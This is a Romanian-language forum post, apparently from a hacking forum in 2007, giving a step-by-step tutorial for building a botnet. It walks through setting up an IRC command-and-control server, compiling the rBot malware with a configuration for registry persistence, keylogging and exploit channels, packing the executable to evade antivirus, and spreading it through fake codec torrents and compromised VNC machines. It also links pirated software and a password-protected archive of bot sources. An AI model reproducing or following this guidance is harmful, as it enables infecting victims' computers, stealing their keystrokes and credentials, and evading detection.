Gonzalez Posted May 9, 2007 Report Posted May 9, 2007 Cum sa creezi BotnetAm scris la tutorialul asta 50 min, deci nu te astepta la mult Ei, multi incepatori doresc sa stie ce e Botnet si cum functioneaza,am scris un tutorial scurt pentru incepatorii RST.Iata si ce include :1.De ce ai nevoie2.Cum sa configurezi un (Ireal)ircd3.Cum sa compilezi bot-ul4.Fati exe-ul nedetectabil5.Modalitati de al raspandi1.De ce ai nevoieSunt multe lucruri care te pot ajuta sa creezi un botnet. Aici am o lista cu necesitatiile botnet-ului, voi explica de ce e nevoie de ele.Visual Studio 6.0http://rapidshare.com/files/18741766/Visual_Studio_6_Enterprice.Cruelintentionz.net.part01.rar.html[url]http://rapidshare.com/files/18742747/Visual_Studio_6_Enterprice.Cruelintentionz.net.part02.rar.htm[/url] [url]http://rapidshare.com/files/18743650/Visual_Studio_6_Enterprice.Cruelintentionz.net.part03.rar.html[/url] [url]http://rapidshare.com/files/18744550/Visual_Studio_6_Enterprice.Cruelintentionz.net.part04.rar.html[/url] [url]http://rapidshare.com/files/18745513/Visual_Studio_6_Enterprice.Cruelintentionz.net.part05.rar.html[/url] [url]http://rapidshare.com/files/18746464/Visual_Studio_6_Enterprice.Cruelintentionz.net.part06.rar.html[/url] [url]http://rapidshare.com/files/18747289/Visual_Studio_6_Enterprice.Cruelintentionz.net.part07.rar.html[/url] [url]http://rapidshare.com/files/18748172/Visual_Studio_6_Enterprice.Cruelintentionz.net.part08.rar.html[/url] [url]http://rapidshare.com/files/18749110/Visual_Studio_6_Enterprice.Cruelintentionz.net.part09.rar.html[/url] [url]http://rapidshare.com/files/18749945/Visual_Studio_6_Enterprice.Cruelintentionz.net.part10.rar.html[/url] [url]http://rapidshare.com/files/18750837/Visual_Studio_6_Enterprice.Cruelintentionz.net.part11.rar.html[/url] [url]http://rapidshare.com/files/18740879/Visual_Studio_6_Enterprice.Cruelintentionz.net.part12.rar.html[/url]Visual Studio 6.0 Service Pack 5 http://download.microsoft.com/download/vstudio60ent/SP5/Wideband-Full/WIN98Me/EN-US/vs6sp5.exeVisual Studio 6.0 Processor Packhttp://download.microsoft.com/download/vb60ent/update/6/w9x2kxp/en-us/vcpp5.exeCore SDKhttp://www.microsoft.com/msdownload/platformsdk/sdkupdate/psdk-full.htmDaca habar nu ai cum sa le instalezi dai click aici :http://www.ryan1918.com/viewtopic.php?t=1509Windows root-at ( Si linuxul este folositor, dar aici vorbesc despre windwos )IrcSursa bot-ului ( Eu am folosit rBot, gasesti botii in arhiva )2.Cum sa configurezi un (Ireal)ircMulte irc-uri sunt usor de configurat, in special cele cu mod. Deseori trebuie doar sa editezi numele, authost,irc port si admin user&password. Ce trebuie sa editam :open username-ales { // Editeaza "username-ales" cu userul dorit from { userhost "numeletau@*"; // Editeaza "numeletau" cu adresa de e-mail }; password "parola-ta-aleasa"; // Editeaza "parola-ta-aleasa" cu parola dorita class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; };};Editeaza flags de mai sus, daca doresti sa adaugi mai multi detinatori de irdc, copy & paste chestiame { name "QuakeNet"; info "QuakeNet"; numeric 1; };Aici este numele serverului, numele poate fi "irc.QuakeNet.org", info este o informatie listen *:6667;Cu usurinta editeaza port-ul, la un port deschis, multe porturi 6500 -> 7000 sunt deschise.Cateva lucruri "extra" de editat hosts { local "QuakeNet"; global "QuakeNet"; coadmin "QuakeNet"; admin "QuakeNet"; servicesadmin "QuakeNet"; netadmin "QuakeNet"; host-on-open-up "yes"; };};Sethost-urile [email]sub7@local.quakenet.org[/email] / [email]sub7@global.quakenet.org[/email].Pune "no" in host-on-open-up ( In loc de "yes" ) daca nu doresti auto-host. restrict-channelmodes "ntsuom"; modes-on-join "+Mustm";Editeaza dupa preferintele tale,pentru a avea un canal securizat.Acum, salveaza configuratia.Arhiveaza si upload-eaza pe un host. Urmatorul pas, este sa deschizi un windows (VNC???) downloadezi fisierele si le ascunzi intr-un folder ascuns, ca C:\Windows\System32\ce_vrei_tu. Apoi porneste exe-ul care iti permite deschiderea ircd-ului, sau fisierul batch se afla deseori acolo in irc mod, vei vedea irc ruland. Nu uita sa pui o parola la VNC,ca nimeni sa nu iti prinda user-ul si parola, securizeaza toate porturile ca botnet-ul sa nu fie "Sniffed" , mirosit:PUrmeaza pasul 3.3.Cum sa compilezi bot-ulrBot-ul e cel mai simplu de folosit Iata o configuratie, usoara :// configuratie bot (generic) - nu trebuie sa fie criptataint port = 6667;int port2 = 6667;int socks4port = 8001;int tftpport = 69;int httpport = 5465;int rloginport = 514;BOOL topiccmd = TRUE;BOOL rndfilename = FALSE;BOOL AutoStart = TRUE;char prefix = '.';int maxrand = 8;int nicktype = CONSTNICK;BOOL nickprefix = FALSE;#ifdef DEBUG_LOGGINGchar logfile[]="%temp%\\yas.jpg";#endif#ifndef NO_CRYPT#else char botid[] = "rx-asn-2-re-worked";char version[] = "v2 by ovelayer";char password[] = "yourpass";char server[] = "";char serverpass[] = "";char channel[] = "#";char chanpass[] = "";rdchar server2[] = ""char channel2[] = "#";char chanpass2[] = "";char filename[] = "yourfile.exe";char keylogfile[] = "keylog.xml"lchar valuename[] = "";char nickconst[] = "rBot|";char szLocalPayloadFile[]="yourfile.exe";char modeonconn[] = "-xi+B";char exploitchan[] = "#*";char keylogchan[] = "#*";char psniffchan[] = "#*";char *authost[] = { "yournick@172.0.0.1"};char *versionlist[] = { "mIRC v6.12 Khaled Mardam-Bey",};char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";char regkey3[]="Software\\Microsoft\\OLE";char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";#endif#ifdef PLAIN_CRYPTchar key[16] = "39lwmmqopma24ik1"; // Schimba ASTA! hmmm..Chiar am nevoie de aceasta ???1. Schimba port-ul de la irc, normal este 6667, daca ai altul schimba.2. Schimba prefix-ul, normal este ".", asta trebuie sa folosesti inaintea comandei, ca: ".login parola".3. Parola, schimb-o pentru a te loga ".login parolanecunoscuta".4. Server-ul, add IP/DNS.5. Parola serverului, probabil nu ai una,dar daca ai schimb-o ( EDIT )6. Canalul, editeaza canalul unde botii vor intra.7. ChanPass, schimba sa fie mai sigur.8. Nu adauga un al doilea server la rBot, deoarece nu va functiona.9. Schimba "filename" pentru a nu fi detectat de vreun AV.10.Fisierul in care PC-urile isi pun keylog-ul nu e necesar.11.Value nume, deci daca exe-ul este numit nod32, atunci valuename = Nod32 AntiVirus sau asa ceva.12.Nickconst este prefixul bot-ului, ca rBot|12345613.Modul de conectare, lasa-l asa cum e.14.Exploit channel, daca bot-ul se raspandeste va lasa un mesaj acolo.15.Keylog si Psniff channel, va trimite mesaje pstore si keylog, dar PSNIFF nu functioneaza la rBot.16.Autohost, poti seta autohostul ca sub7@*, asta va necesita sa ai nickname-ul ca toate hosturile, poti seta *@anonym0us.eu .17.Lasa restul asa cum e.4.Fati exe-ul nedetectabilInainte sa incepi cu totul trebuie sa faci exe-ul securizat, exista packer-e, este greu sa faci rost de un bun packer in acest moment, dar poti folosi pe cele publice, care face ca exe-ul sa fie detectat de nod32, kaspersky ( companiile mari de antivirusi ). Fisierul tau trebuie sa fie mic pentru a se raspandi, dar si nedetectabil, altfel un AV il va detecta...5.Modalitati de al raspandiSunt multe cai de raspandire, ai nevoie de boti inainte de a incepe sa raspandesti exploituri via care sunt localizati in botii tai.Ex: il rogi pe un tip, sa downloadeze cu botii lui altii pe exe-ul tau, care iti permite sa pornesti un bnet, dar deasemenea ai nevoie de raspandire via torrent, doar creeaza un torrent cu film si exe-ul tau ( el fiind "codecul" sau ... ) sau scaneaza VNC-uri, infecteazale usor deschizand IE si exe ( STERGETI HISTORY ) Download surse si IRC KITTS :http://rapidshare.com/files/30408915/Botnet.rar.htmlPassword :sub7@rstzone.netInfo :http://en.wikipedia.org/wiki/Image:Zombie-process.pngBafta!-sub7 Quote
